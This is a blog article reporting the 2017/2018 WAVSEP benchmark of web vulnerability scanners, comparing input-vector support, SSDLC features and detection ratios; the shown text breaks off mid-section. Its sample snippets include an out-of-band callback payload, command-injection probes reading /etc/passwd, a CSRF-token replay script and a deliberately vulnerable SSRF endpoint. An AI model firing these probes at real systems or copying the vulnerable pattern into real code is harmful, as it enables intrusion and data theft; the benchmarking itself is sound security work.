Friday, November 10, 2017

WAVSEP 2017/2018 - Evaluating DAST against PT/SDL Challenges

The 2017/2018 WAVSEP DAST Benchmark:


Evaluation of Web Application Vulnerability Scanners in Modern Pentest/SSDLC Usage Scenarios

Information Security Analyst, Researcher, and Speaker

November 10th, 2017 / Updated January 31st, 2018
Assessment Environments: WAVSEP 1.7, WAVSEP-EXT, Various SPA Apps
Multiple content contributions by Achiad Avivi and Blessen Thomas

Sponsored by:



Table of Contents
1. Introduction

2. Benchmark Overview
    2.1 List of Tested Web Application Scanners
    2.2 The Evaluation Criteria
    2.3 The False Positive Aspect in Penetration-Tests / SSDLC
    2.4 New Technologies Overview - Out of Band Security Testing - OAST

3. Benchmark Results
    3.1 Input Delivery Vector Support (Update)   
    3.2 Support for Overcoming Modern Scan Barriers (Altered)
    3.3 Support for Crucial SSDLC Integration Features (New!)  
    3.4 The Detection Ratio of OS Command Injection (New!)
    3.5 The Detection Ratio of Remote File Inclusion/SSRF (Altered)
    3.6 The Detection Ratio of Path Traversal (Update)
    3.7 The Detection Ratio of SQL Injection (Update)
    3.8 The Detection Ratio of Cross Site Scripting (Update)
    3.9 The Detection Ratio of Unvalidated Redirect (Update)
    3.10 The Detection Ratio of Backup/Hidden Files (Update)




Related resources:
DAST vs SAST vs IAST - Modern SSDLC Guide
Scanner Selection Wizard - A Step by Step Guide for Choosing the Right Web Application Vulnerability Scanner for *You*
Detailed result presentation at Sectoolmarket / TECAPI: http://www.sectoolmarket.com (not updated yet)



1. Introduction


Two years of preparation, development and research have finally come to fruition, and the 2017 WAVSEP benchmark is here.

It includes extremely useful information for anyone planning to integrate DAST scanners into SDLC processes, compares numerous features of commercial and open-source solutions, and demonstrates how far these technologies have advanced and matured over the last decade.

Like the benchmarks published in previous years, WAVSEP covers the main contenders in the DAST (dynamic application security testing) field, both open source and commercial.

We did a couple of things differently this time.

We went out into the field and integrated the automated, periodic execution of the various tested solutions into real-life enterprise SDLC processes to test their effectiveness, gaining hands-on experience that helped us better understand the field and its requirements.

During at least 4-5 long-term implementations of DAST/SAST/IAST solutions in SSDLC processes for financial / hi-tech / telecom organizations, we attempted to directly and indirectly handle modern technologies (SPA/Angular/React/etc.) and complex architectures to see whether the various vendor-proclaimed features actually work. With solutions ranging from prominent open source projects to high-end enterprise commercial products, that process yielded some interesting conclusions.

Some of these experiences led us to develop test cases aimed at inspecting issues in proclaimed features that we noticed did not work as expected in actual implementations, and some led to the creation of comparison categories that turned out to be crucial for real-world implementations.

The wavsep evaluation test-bed (now at version 1.7) was expanded with additional test cases, and a new wavsep-mirror project called wavsep-ext was created to host JSON/XML test case variants.

Before discussing the actual content, I'd like to extend my deep gratitude to the various volunteers who assisted in obtaining and compiling the vast amount of information, and, even more importantly, in compiling it into a (relatively) readable format. I'd also like to thank the vendors, who assisted us with licensing, responded within unrealistically short time-frames, and pushed us to move forward with the evaluation.

And for the curious - a simple answer to an expected question -
Why was the publication delayed for so long?

Each benchmark is typically more complicated than the previous one, primarily because of our goal to cover additional aspects in each publication, which requires us to expand the test-beds (via the development of new test cases or the usage of new test-beds).

Some of these "expansions" require unproportional amount of effort -

For example -

Some of the newly implemented test cases required the scanner both to crawl JavaScript/jQuery/AJAX-driven web pages and to eventually scan entry points that expect JSON/XML input sent through those pages.

During the test, many scanners surprisingly did NOT manage to crawl the JSON/XML pages (due to lack of relevant crawling features, bugs, or perhaps our specific implementation).

So, prior to scanning, for more than 250 different JSON/XML test cases, we had to manually teach the various tested tools the structure of the XML/JSON requests and parameters, or, when we got lucky and had a valid license for a scanner that could crawl these new test cases, chain that scanner to the various tools that couldn't.

Since these licenses typically expired just when we needed them... most of that work was manual, and thus setbacks during these assessments became common, and QA sessions became longer and more time-consuming.


And with that out of the way, we can start covering this year's content -

2. Benchmark Overview


2.1 List of Tested Web Application Scanners

 

Evaluated commercial web application scanners:
  • Appspider v6.14.060 (Rapid7 ltd, acquirer of NTO)
  • Netsparker v4.8 (Netsparker ltd.)
  • Acunetix v11.0.x build 171181742 (Acunetix ltd.)
  • Burpsuite v1.7.23 (Portswigger)
  • WebInspect v17.10XX (HPE)
  • WebCruiser v3.5.4 (Janusec)
Evaluated open source scanners:
  • Zed Attack Proxy (ZAP) 2.6.0
  • Arachni 1.5-0.5.11
  • IronWASP 0.9.8.6
  • WATOBO v0.9.22
Previously evaluated / upcoming evaluations of commercial web application scanners:
  • Appscan v9.0.0.999 build 466 - 2014/2015 (IBM) 
  • Syhunt Dynamic v5.0.0.7 RC2 - 2014/2015 (Syhunt)
  • N-Stalker Enterprise v10.14.1.7 - 2014/2015 (N-Stalker)
  (Results of the new benchmark tests for most of these products will be updated soon in STM)
Legacy/Inactive commercial web application scanners results were not included (but are still included in the various charts in STM):
  • ParosPro v1.9.12 (Milescan) 
  • JSky v3.5.1-905 (NoSec)
  • Ammonite v1.2 (RyscCorp)

Previously evaluated / upcoming evaluations of open source web application scanners:
  • W3AF 1.6
  • Vega 1.0 
  • Wapiti 2.3.0
  • Skipfish 2.1.0
  • sqlmap 1.0
  • XSSer 1.6.1

In regard to vendors with newer production versions that were NOT evaluated: we either initially got a license which expired mid-test and then didn't manage to contact the vendor in time (the contacts we had were unreachable / no longer worked for the vendor), or the budget and deadline we had for the project required us to restrict our coverage to a limited set of vendors.

Some of the unevaluated newer product versions will be covered in the upcoming weeks, while vendors of new and previously uncovered contenders may refer to the join-wavsep section in STM.


2.2 The Evaluation Criteria

 

The 2017 evaluation focused on several previously uncovered aspects, in addition to "repeating" most of the tests performed on previous benchmarks:

  • Covering the prominent vendors in 2017, and the newly introduced technologies in the field, and their effect on various users (penetration testers, SSDLC users).
  • Assessing the detection ratio of previously tested vulnerabilities in modern JSON/XML input vectors - to verify the proclaimed support for the attack vector in the various categories (extremely interesting results that affect the overall scores).  For that purpose, MANY test cases were re-implemented with JSON/XML inputs, posing a challenge for both scanning features (covered in the article) and crawling features (will be discussed in future article updates)
  • Assessing the detection of additional vulnerabilities (OS Command Injection, repurposing XSS-via-RFI test to be used for SSRF evaluations as well).
  • The release of a new version of wavsep evaluation test-bed, available in wavsep git-hub and source-forge repositories.

The article attempts to simplify the presentation of content, and as a result, various additional elements will only be presented and updated through the benchmark presentation platform residing at STM (full and extensive list of features, scan logs, etc).

Before we start with the raw stats, it's important to cover a few subjects related to the technologies being evaluated:

2.3 The False Positive Aspect in Penetration-Tests / SSDLC


Depending on the vulnerability assessment process, false positives will typically have the following effect:
  • An (arguably) minor time consuming effect in external penetration tests (in the context of a manual-driven pentest)
  • A major time consumer in the overall scale of periodic automated scans within SSDLC scenarios  

Weeding out a reasonable amount of false positives during a pentest is not ideal, but could be performed with relative ease. However, thousands upon thousands of false positives in enterprise SSDLC periodic scan scenarios can take their toll.

Replacing DAST technologies ("scanners") in black-box penetration tests, a widespread and widely consumed commodity these days, does not seem likely in the foreseeable future.
The concept of a black-box penetration test inherently prevents "intrusive" technologies (IAST/SAST) from being used by the external assessing entity in the vast majority of scenarios.

However, in SSDLC driven assessments (secure software development life-cycle), such as periodic scanning / build-triggered scanning, DAST technologies are challenged by SAST / IAST / Hybrid technologies.

Several years of fierce competition and the adoption of additional technologies for vulnerability detection (IAST / SAST / OSS) haven't been easy for the various vendors, and even prompted certain entities to proclaim that DAST technologies are obsolete and/or superseded by SAST/IAST technologies.

In the long run, however, competition tends to have a positive impact on technology (and quality). In the case of DAST vendors, in addition to enhanced technology support and adaptation, both the detection ratio of exposures and the false-positive ratio of maintained DAST solutions improved drastically, due to various enhancements and a new DAST-related technology -


2.4 Enter Out-of-Band-Security-Testing (OAST) - Overview


The technological response of DAST vendors to the enhanced accuracy of active IAST capabilities, whether intentional or unrelated, includes (among additional enhancements) tests falling under the category of out-of-band security testing (sometimes coined OAST, to match the typically used naming convention). This previously understated and unprecedentedly accurate method of identifying second-order ("blind"/"indirect") vulnerabilities and reducing false positives keeps DAST technologies well within the race of relevant technologies.

The concept of OAST tests is to inject exploitation "payloads" that communicate with verification servers on the internet, which are able to identify external access and associate it with a specific vulnerability test in a specific scan.

So, let's say for example that out-of-band SQL/XSS injection payloads were used in a scan and stored in the database. They may only be "executed" at a later phase, such as when an administrator views logs of application activities that include these payloads, or when a processing script runs on the database content. While "normal" scanner injection tests would likely have missed the exposure, out-of-band exploitation payloads "report" to the external server when executed, enabling the scanner to (eventually) identify the vulnerability.
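
A minimal sketch of the correlation mechanism described above, assuming a hypothetical verification server and token scheme (the actual vendor implementations differ and are not public):

```python
import uuid
import requests  # assumption: the verification server exposes a simple HTTP query API

CALLBACK_DOMAIN = "oast-callback.example.net"   # hypothetical verification server

def build_oob_payload(scan_id, test_id):
    # Embed a unique token so that any later callback can be traced back
    # to the exact scan and test case that planted the payload.
    token = f"{scan_id}-{test_id}-{uuid.uuid4().hex[:8]}"
    # Example out-of-band payload for a second-order injection point: if the
    # stored value is ever rendered/executed (e.g. by a log viewer or a batch
    # job), it triggers a DNS/HTTP lookup of the unique sub-domain.
    payload = f"<img src='http://{token}.{CALLBACK_DOMAIN}/x'>"
    return token, payload

def was_triggered(token):
    # Poll the verification server for interactions matching our token.
    # The /interactions endpoint and its JSON format are assumptions.
    resp = requests.get(f"http://{CALLBACK_DOMAIN}/interactions",
                        params={"token": token})
    return resp.ok and resp.json().get("hits", 0) > 0
```

The unique token is the key: because any interaction carries it, the scanner can attribute a callback that arrives hours after the scan to the exact injection point that planted the payload.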

Although out-of-band payloads are not yet included in all of the relevant scan "plugins" of the various vendors, the support for these tests is becoming more extensive, at least for some of the commercial vendors. 

Coupled with the other accuracy enhancements in DAST technologies (algorithm/attack-tree improvements), out-of-band testing can provide a huge boost both to detection accuracy and to the types of vulnerabilities automated scanning solutions (DAST in this case) are able to identify.

And now, to the main point -

3. Benchmark Results

The following sections cover the results of the feature comparisons and accuracy benchmarks of the various tools assessed.

FAQ
1) Why do the results differ from previous benchmarks?

The results in the various charts represent an aggregated score of four input vectors (GET/POST/XML/JSON), as opposed to previous benchmarks, which only included two input vectors (GET/POST).
The newly implemented test cases were only added for attack vectors where they are relevant (i.e. attacks that can be executed via JSON/XML POST requests, such as LFI/RFI/etc.), and not for (mostly) irrelevant attack vectors (XSS/Unvalidated-Redirect/Backup-Files).


3.1 Input Delivery Vector Support (Updated)

 

The term "input delivery vector", or rather input delivery format, refers to the structure of inputs being used in the client-server communication to deliver values from the browser/mobile/client-application to the web server.
Examples can include query-string embedded parameters (GET), HTTP body parameters (POST), JSON arrays in the HTTP body (JSON), and so on.
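
To illustrate, the same logical parameter can reach the server in several delivery formats, and a scanner has to recognize and inject into each of them. A minimal sketch using the Python requests library against a hypothetical endpoint:

```python
import requests

BASE = "http://target.example/app/search"   # hypothetical endpoint

# Query-string embedded parameter (GET)
requests.get(BASE, params={"query": "shoes"})

# HTTP body parameter (classic POST form)
requests.post(BASE, data={"query": "shoes"})

# JSON object in the HTTP body (typical for SPA / REST back-ends)
requests.post(BASE, json={"query": "shoes"})

# XML in the HTTP body (typical for SOAP / legacy web services)
requests.post(BASE, data="<search><query>shoes</query></search>",
              headers={"Content-Type": "application/xml"})
```

A scanner that only understands the first two formats will never place a payload inside the JSON or XML variants, regardless of how good its detection logic is.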

Since the ability to parse, analyze and simulate attacks on input delivery vectors determines whether or not DAST scanners will be able to identify vulnerabilities relevant to the parameter, I still consider the scanner's support for the tested application's input delivery methods to be the single MOST significant aspect in the selection process of any scanner.

Although it's not necessary to support every possible input delivery vector, the scanner should be able to scan the prominent input vectors used in the application to be effective.

The following table presents a prominent vector-support comparison between commercial DAST vendors:

[Chart: Input Delivery Vector Support - Commercial DAST Scanners]


* burp-suite requires changing the default configuration for effective AMF scan support
* burp-suite requires the "GWT Insertion Points" extension for effective GWT scan support



The following table presents a prominent vector-support comparison between open source DAST tools:

[Chart: Input Delivery Vector Support - Open Source DAST Tools]



* zap effective support of AMF scanning is unclear (a project was initiated) and requires the installation of an optional "AMF" plugin from the store
* w3af has open and active projects to develop support for REST API/JSON and AMF support. Unknown schedule/release date.
* Bugs in IronWASP's JSON/XML support prevent it from effectively parsing and scanning JSON/XML inputs. This may be related to improper content-types.


Although the interpretation of the results is left to the reader, it's important to note that lack of support for prominent input vectors limits the capabilities of scanners in relevant test scenarios, particularly in various payload injection tests.

The definition of prominent input vectors changes between applications, and requires the tester to "profile" the input vectors in use in the application, to identify the input formats crucial for scanners to support.

It is well worth mentioning that burp-suite, zap, ironwasp and arachni (and in theory, other tools with fuzz testing capabilities) support custom input vectors (e.g. scanning ANY part of the protocol) - typically by configuring specific sections in HTTP requests (useful for limited testing of "unsupported" delivery methods). Furthermore, burp-suite and zap seem to support scanning/testing raw websockets (e.g. scanning non-HTTP protocols), which might be useful for certain assessments.

To the best of my knowledge, currently only ZAP supports out-of-the-box scanning of odata-id vectors (with WebInspect planning to support them in upcoming releases), while DOM-related vectors were not evaluated in this article for any of the contenders.

Full charts will be available in the upcoming update to STM.


3.2 Support for Overcoming Modern Scan Barriers (Altered)

 

Ever tried to run a scanner against a website, and it "just didn't work"?
Apart from a lack of support for the relevant input vectors (JSON/XML/etc.) or an ineffective crawling mechanism, there are additional "barriers" that can prevent a scanner from successfully testing a target.

Support for replaying CSRF parameters/headers, support for including multiple domains in the scope of a single scan (crucial for SPA micro-service architectures), and similar key elements are required to successfully scan modern applications, particularly in the context of periodic BDD/TDD assessments.
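
To illustrate the anti-CSRF barrier: if a scanner replays requests with a stale token, the application rejects them before the injected payload is ever processed. The following is a minimal sketch of the refresh-and-replay logic a scanner (or an external proxy script) needs, assuming a hypothetical form page and token field name:

```python
import re
import requests

session = requests.Session()
FORM_URL = "http://target.example/profile"          # hypothetical page issuing the token
ACTION_URL = "http://target.example/profile/update" # hypothetical form action

def fetch_fresh_csrf_token():
    # Re-request the page that issues the token before every attack request;
    # the field name "csrf_token" is an assumption about the target application.
    html = session.get(FORM_URL).text
    match = re.search(r'name="csrf_token"\s+value="([^"]+)"', html)
    return match.group(1) if match else None

def send_attack_request(param_name, payload):
    # Every replayed request carries a freshly harvested token, so the
    # anti-CSRF filter no longer blocks the injected payload.
    token = fetch_fresh_csrf_token()
    return session.post(ACTION_URL, data={"csrf_token": token, param_name: payload})
```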

The following table compares the scan barrier support of commercial DAST scanners:

[Chart: Scan Barrier Support - Commercial DAST Scanners]



* burp-suite support for recording/re-performing login / in-session detection currently relies on the macro feature
* burp-suite has de-facto support for SPAs with multiple domains, due to the tester's ability to include any domain in scope
* burp-suite supports anti-CSRF tokens via the CSurfer extension or the macro feature (run a post-request macro)
* Acunetix support for multiple domains requires setting up an additional Target and then adding the secondary Target as an "Allowed Host" to the first Target
   (Targets > TARGET_NAME > Advanced > Enable "Allowed Hosts" and pick the other Target you want to include as part of the scan)

* The angular/react crawling support is based on vendor claims, and was not yet evaluated through a dedicated benchmark
* Some of the missing features can be "externally" supported, by forwarding traffic through burpsuite/zap/fiddler with auth/match-and-replace rules
 

The following table compares the scan barrier support of open-source DAST scanners:

[Chart: Scan Barrier Support - Open Source DAST Scanners]



* ZAP supports re-performing authentication via built-in authentication features and zest scripts, as shown in the following article
* Subgraph vega supports authentication recording via macros
* Any scanner that has tree-view manual scan support can at least partially support scans of SPA with multiple domains
* Some of the missing features can be "externally" supported, by forwarding traffic through burpsuite/zap/fiddler with auth/match-and-replace rules
* ZAP/IronWASP angular/react crawling is possible only through browser based crawling (crawljax/etc). Requires configuration/dependencies. 
* W3AF anti-CSRF plugin seems to be only partially implemented (false-negatives)


3.3 Support for Crucial SSDLC Integration Features (New!)

 

As opposed to manual security assessments, and performance in detection accuracy tests aside, in order to efficiently use DAST tools in an SSDLC the scanner typically needs to support several key features.

Although NOT all of the features are required for each SSDLC integration, some can be useful or even necessary, depending on the process goals and requirements:

  • Defect Tracking Integration - support reporting "vulnerabilities" directly to defect tracking repositories such as JIRA/TFS/Bugzilla/Trac/etc.
  • Continuous Integration Support (BDD) - support for CLI/API/plugin-based scanning through external continuous-integration / build-management software such as Jenkins; de-facto external support for scheduled scans (a minimal example is sketched after this list).
  • Selenium Import/Integration (TDD) - importing crawling results or otherwise integrating with selenium scan scripts.
  • Periodic/Scheduled Scans - built-in scheduled scans (also possible externally through continuous integration support via CLI/API/plugins)
  • Periodic Results Gap Analysis - analyzes and presents the result diff between scans, or otherwise compares periodic scans.
  • IAST Module Hybrid Analysis - although classified under different categories, some products have both DAST and IAST modules, and are further able to combine their results through scans in what is typically called Hybrid-Analysis, and integrate them in TDD/BDD scenarios.
  • SAST Module Hybrid Analysis - In a similar manner, either through collaboration or built-in features, some vendors (typically commercial) have both DAST and SAST modules, or are otherwise able to use "hybrid-analysis" with results of external SAST tools, potentially getting the "best" out of both worlds. DOM-focused SAST mechanisms were NOT considered full SAST modules for the purpose of this article.
  • Extensibility - the ability to extend the scanner with custom plugins, tests and scripts.
  • WAF Virtual Patch Generation - the ability to generate a virtual patch rule for a WAF out of scan results/vulnerabilities identified.
  • Enterprise Console Management Features - the ability to manage results in a graphical user interface - view charts/lists, mark false positives, search, import, export and classify results, etc. A full check-mark is awarded to products with homegrown on-premise solutions (to support finance/defense sector closed networks), while a half-check-mark is awarded to cloud solutions that can be used "indirectly" to scan internal solutions and presents results in an enterprise-like console, or to solutions with 3rd party enterprise console integration (e.g. threadfix, seccubus, etc).
The comparison tables attempted to present both the built-in support for features (full check-mark), and support through integration with 3rd party products (cross-check-mark).
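
As an example of the continuous integration category above, the following is a minimal sketch of gating a build on DAST results, using the official ZAP Python API client (zapv2) against a ZAP daemon assumed to be listening on 127.0.0.1:8080; the target URL, API key and risk threshold are placeholders:

```python
import sys
import time
from zapv2 import ZAPv2   # pip install python-owasp-zap-v2.4

TARGET = "http://target.example"                 # placeholder target
zap = ZAPv2(apikey="changeme",                   # placeholder API key
            proxies={"http": "http://127.0.0.1:8080",
                     "https": "http://127.0.0.1:8080"})

# Crawl the target, then run an active scan through the ZAP daemon.
spider_id = zap.spider.scan(TARGET)
while int(zap.spider.status(spider_id)) < 100:
    time.sleep(2)

scan_id = zap.ascan.scan(TARGET)
while int(zap.ascan.status(scan_id)) < 100:
    time.sleep(5)

# Fail the build if any high-risk alert was raised.
high_risk = [a for a in zap.core.alerts(baseurl=TARGET) if a.get("risk") == "High"]
if high_risk:
    print(f"{len(high_risk)} high-risk findings - failing the build")
    sys.exit(1)
```

The same pattern - trigger a scan via CLI/API, parse the results, and fail the build above a threshold - is essentially what the CI plugins of the commercial products automate.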

The following table presents a comparison of built-in/external prominent SSDLC feature support in commercial DAST tools:

[Chart: SSDLC Feature Support - Commercial DAST Tools]


 Comparison notes:

 * SAST modules are typically provided as separate 3rd-party products and require additional costs. IAST modules (for whatever reason, and luckily for us) are typically included in the pricing of the commercial DAST web application scanner.

* WAF virtual patching rule generation support is WAF specific and varies between vendors: Netsparker supports rule generation for ModSecurity, Acunetix supports F5/Fortinet/Imperva, AppSpider supports F5/Fortinet/Imperva/Akamai/DenyAll/ModSecurity/Barracuda, Appscan/Webinspect support virtual patch generation for various WAFs (missing list), and 3rd party interfaces such as Threadfix can create virtual patch rules for WAFs from the results of multiple supported scanners.

* Usage of external management frameworks (BDD-Security, Seccubus, ThreadFix, DefectDojo, Faraday, Dradis, Jenkins + CLI) can "compensate" for MANY of the missing SSDLC features of supported scanners, by parsing scan reports and converting issues to virtual patch rules / defect tracking entries, performing periodic result gap analysis, externally scheduling scans, etc. The table uses a check-mark to signify built-in feature support, and a half-cross/half-check-mark for external support through 3rd-party software or plugins.

* The Netsparker on-premise centralized management framework is available through an on-premise installation of Netsparker Cloud.

* In particular - burpsuite virtual patching rule generation is available through external mod-security scripts or through ThreadFix integration. The same applies to "indirect" defect tracking support, "enterprise-console" vulnerability management features, and scan scheduling, which is possible by combining Jenkins/TeamCity/SonarQube with any scanner's CLI interface.

* articles describing methods of "automating" scans with burpsuite: 
   https://www.securify.nl/blog/SFY20160901/burp-suite-security-automation-with-selenium-and-jenkins.html 

* recent updates to the Burp CLI interface and external plugins make it possible to use it in some CI scenarios - the extent is still being verified by the author:
   http://releases.portswigger.net/2017/

* various external projects provide some interfaces to use burpsuite with selenium, such as: https://github.com/malerisch/burp-csj
  
* Methods for manual/external selenium integration with Netsparker / Burpsuite are officially documented: 
   https://www.netsparker.com/blog/docs-and-faqs/selenium-netsparker-manual-crawling-web-applications-scanner/
   https://support.portswigger.net/customer/portal/articles/2669413-using-burp-with-selenium
   Similar methods could be used with webcruiser as well.

* enterprise console management features are integrated into appscan/webinspect enterprise versions. Other products may support the features either in cloud product variations or through integration with a 3rd party product (e.g. Threadfix, DefectDojo, etc).

* The Webinspect/Appscan SAST-module hybrid-analysis features are in fact integrations with Fortify (Webinspect) and Appscan Source. 3rd party products are also capable of performing hybrid analysis on the results of seemingly unrelated products.

The following table presents a comparison of built-in/external prominent SSDLC feature support in open source DAST tools:

[Chart: SSDLC Feature Support - Open Source DAST Tools]


Comparison notes:

* Usage of external management frameworks (BDD-Security, Seccubus, ThreadFix, DefectDojo, Faraday, Dradis, Jenkins + CLI) can "compensate" for MANY of the missing SSDLC features of supported scanners, by parsing scan reports and converting issues to virtual patch rules / defect tracking entries, performing periodic result gap analysis, externally scheduling scans, etc. The table uses a check-mark to signify built-in feature support, and a half-cross/half-check-mark for external support through 3rd-party software or plugins.

* In particular - zap / arachni / w3af / skipfish virtual patching rule generation is available through external mod-security scripts or through ThreadFix integration. The same applies to "indirect" defect tracking support, "enterprise-console" vulnerability management features, and scan scheduling, which is possible by combining Jenkins/TeamCity/SonarQube with any scanner's CLI interface.

* custom parsing of arachni's JSON output is reportedly being used to update the JIRA defect tracking system:
https://www.newcontext.com/automate-web-app-security-scanning/


* selenium support is available/partially available for some of the tools using the following methods:
** arachni uses selenium webdrivers for login scenarios, support for importing selenium crawl results is unknown.
** Unofficial plugins for using w3af with selenium have been published: https://dumpz.org/16826/
** External IronWASP selenium Integration module: https://github.com/arorarajan/IronWaspSelenium/tree/V1
** Guides for using selenium through ZAP are available (using various projects) - the process could theoretically be used with other scanners that have proxy capabilities:
https://linkeshkannavelu.com/2015/01/08/security-test-automation-using-selenium-and-zap/
https://securify.nl/blog/SFY20160601/using_owasp_zap__selenium__and_jenkins_to_automate_your_security_tests_.html
https://www.coveros.com/running-selenium-tests-zap/
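
The common pattern behind these guides is simply to route the Selenium-driven browser through the scanner's intercepting proxy, so that every page exercised by the functional tests also lands in the scanner's site tree. A minimal sketch, assuming ZAP (or any other intercepting proxy) is listening on 127.0.0.1:8080 and a hypothetical application URL:

```python
from selenium import webdriver

# Route the browser used by the functional/TDD tests through the DAST proxy,
# so every page and request exercised by the tests is recorded for scanning.
options = webdriver.ChromeOptions()
options.add_argument("--proxy-server=http://127.0.0.1:8080")
options.add_argument("--ignore-certificate-errors")   # the proxy re-signs TLS traffic

driver = webdriver.Chrome(options=options)
try:
    driver.get("http://target.example/login")   # placeholder application URL
    # ... the regular Selenium test steps run here ...
finally:
    driver.quit()

# An active scan can then be launched against the URLs the proxy observed,
# e.g. via the scanner's API, CLI or user interface.
```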


In general, although some of the tools contain built-in SSDLC related features, 3rd party software (ThreadFix / DefectDojo / Dradis / Seccubus / BDD-Security / Faraday / Jenkins) can enhance the scanner capabilities through external features and integration.

These solutions typically have commercial and/or integration costs, but may allow using most of the tools in SSDLC scenarios with some integration effort, while providing the various benefits of a commercial-scale managed platform.


3.4 The Detection Ratio of OS Command Injection (New!)


To expand the coverage of the benchmark evaluated features, dedicated test cases were implemented to simulate entry points vulnerable to OS command injection.

Unlike most of the previous benchmark evaluations, this year's benchmark included test cases with JSON/XML support (primarily implemented in the extension project wavsep-ext).
In total, the OS command injection benchmark included 224 NEW test cases, half of which used JSON/XML inputs.
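
For context, the JSON/XML variants deliver the same kind of command-injection payloads as the classic GET/POST test cases, only wrapped in a structured body. A simplified illustration of such probes (the endpoints and parameter names are hypothetical, not the actual WAVSEP test case paths):

```python
import requests

# Classic POST-parameter variant of an OS command injection probe
requests.post("http://target.example/ping",
              data={"host": "127.0.0.1; cat /etc/passwd"})

# The equivalent JSON-body variant: the scanner must parse the JSON structure
# and place the payload inside the "host" value in order to detect anything.
requests.post("http://target.example/api/ping",
              json={"host": "127.0.0.1; cat /etc/passwd"})
```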

The following table presents the OS Command Injection detection / false-positive ratio of commercial DAST vendors:

[Chart: OS Command Injection Benchmark - Commercial Vendors]

  


* missing results from 2-4 additional commercial vendors will be updated in the upcoming weeks.
* In order to get to a score of 100% with Netsparker, it's required to disable the "content optimization features", otherwise the score will be 45.98%.
Since WAVSEP test cases look very similar to each other (rare in real life applications), various products with scan optimization features may ignore some of the test cases since they will be categorized as "identical pages", and thus scanning may require similar configurations in other products as well.
To disable it, hold down CTRL while clicking "Options", change "DisableContentOptimization" to TRUE, save, and restart Netsparker.


The following table presents the OS Command Injection detection / false-positive ratio of open source DAST projects:

[Chart: OS Command Injection Benchmark - Open Source Vendors]



3.5 The Detection Ratio of Remote File Inclusion/SSRF (Altered)

 

Although (XSS via) remote file inclusion (RFI) test cases were covered in previous benchmarks, in terms of exploitation we didn't treat them as potential SSRF (server-side request forgery) vulnerable entry points - an exploitation method which is (arguably) more severe than XSS-via-RFI.

This year we included both RFI and SSRF plugins in the scans of the original "RFI" test cases, which might have affected the results.
Furthermore, as in the case of OS command injection, NEW test cases for JSON/XML inputs were implemented for SSRF/RFI, effectively doubling the number of tests from 108 to 216 valid test cases (108 NEW test cases), with the previous 6 false positive categories remaining intact.
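
The reason the same entry points serve both tests is that the vulnerable code fetches whatever URL the parameter points to; whether that URL hosts attacker-controlled script content (XSS-via-RFI) or an internal address (SSRF) is only a matter of the payload. A deliberately vulnerable sketch, purely for illustration (Flask, hypothetical endpoint, not a WAVSEP test case):

```python
import requests
from flask import Flask, request

app = Flask(__name__)

@app.route("/render")
def render_remote():
    # Vulnerable pattern: the server fetches a caller-supplied URL.
    #   ?url=http://evil.example/payload.js   -> XSS via remote file inclusion
    #   ?url=http://169.254.169.254/latest/   -> SSRF against internal services
    url = request.args.get("url", "")
    return requests.get(url, timeout=5).text
```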

However, at the moment, new "blind" SSRF test cases were not (YET) included in the benchmark, due to time-frame and licensing constraints, so evaluations of out-of-band SSRF detection mechanisms are still pending.

The following table presents the RFI / SSRF detection / false-positive ratio of commercial DAST vendors:

[Chart: RFI / SSRF Benchmark - Commercial Vendors]



* results from previous benchmarks might be DRASTICALLY different due to the introduction of 108 NEW JSON/XML test cases. 
* the GET/POST-only results of Appscan, Syhunt and N-Stalker were intentionally not published, so as to avoid misinterpretation. The products' updated results might be published in the upcoming weeks.

The following table presents the RFI / SSRF detection / false-positive ratio of open source DAST projects:

[Chart: RFI / SSRF Benchmark - Open Source Vendors]


* results from previous benchmarks might be DRASTICALLY different due to the introduction of 108 NEW JSON/XML test cases.


3.6 The Detection Ratio of Path Traversal (Update)


The evaluation used the same Path-Traversal/LFI test-bed used in the previous benchmarks, which cover GET and POST input delivery vectors in 816 valid test cases, and 8 false positive categories. Due to some automation methods on our part, the interpretation of certain false-positive test cases might be more severe than in previous benchmarks.

The following table presents the Path Traversal detection / false-positive ratio of commercial DAST vendors:

[Chart: Path Traversal Benchmark - Commercial Vendors]


* due to incomplete QA processes on our behalf, the results of Acunetix and Webinspect may require an update in the next few weeks.


The following table presents the Path Traversal detection / false-positive ratio of open source DAST vendors:

[Chart: Path Traversal Benchmark - Open Source Vendors]


* due to incomplete QA processes on our behalf, the results of WATOBO and arachni may require an update in the next few weeks.



3.7 The Detection Ratio of SQL Injection (Update)

 

The evaluation used the same SQL injection test-bed used in the previous benchmarks, which cover GET and POST input delivery vectors in 136 valid test cases, and 10 false positive categories. Load related issues may have slightly affected results (a typical problem with sql injection scanning due to time based plugins / connection pool issues), but the overall results remain intact.
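
For readers unfamiliar with why load matters here: time-based blind SQL injection plugins infer the vulnerability from response delays, so a congested test environment (or an exhausted connection pool) can cause both misses and false alarms. A simplified sketch of such a check, with a hypothetical endpoint and a MySQL-style payload:

```python
import time
import requests

URL = "http://target.example/item"   # hypothetical endpoint

def response_time(value):
    start = time.monotonic()
    requests.get(URL, params={"id": value})
    return time.monotonic() - start

baseline = response_time("1")
delayed = response_time("1 AND SLEEP(5)")   # MySQL-style time-based payload

# If the server is already slow because of scan load, this naive
# threshold check can misfire in both directions.
if delayed - baseline > 4:
    print("parameter 'id' looks injectable (time-based)")
```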

The following table presents the SQL Injection detection / false-positive ratio of commercial DAST vendors:

[Chart: SQL Injection Benchmark - Commercial Vendors]


The following table presents the SQL Injection detection / false-positive ratio of open source DAST projects:

[Chart: SQL Injection Benchmark - Open Source Vendors]


* ZAP's vanilla installation gets about 75% detection, as opposed to the high result of previous benchmarks, and only yielded a result similar to previous benchmarks after installing the beta/alpha active scan plugins and configuring the Low/Insane detection settings. These additional plugins also seem to yield a significant amount of false positives.


3.8 The Detection Ratio of Reflected Cross Site Scripting (Update)

 

The evaluation used the same XSS test-bed used in the previous benchmarks, which cover GET and POST input delivery vectors in 66 valid test cases, and 7 false positive categories.

The following table presents the XSS detection / false-positive ratio of commercial DAST vendors:

[Chart: Reflected XSS Benchmark - Commercial Vendors]



The following table presents the XSS detection / false-positive ratio of open source DAST projects:

[Chart: Reflected XSS Benchmark - Open Source Vendors]


* arachni's "imperfect" score seems to be intentional - since the project removed support for VBscript related XSS tests due to their lack of relevance to modern browsers and modern websites. the only test cases currently missed by the project are VBScript XSS test cases. 



3.9 The Detection Ratio of Unvalidated Redirect (Update)


The evaluation used the same unvalidated-redirect test-bed used in the previous benchmarks, and focused only on GET input delivery vectors, in a total of 30 valid test cases and 9 false positive categories (vulnerable unvalidated redirect POST entry points only contribute to phishing credibility in indirect session-storing/multi-phase scenarios, and these were not covered in the benchmark).

The following table presents the unvalidated redirect detection / false-positive ratio of commercial DAST vendors:

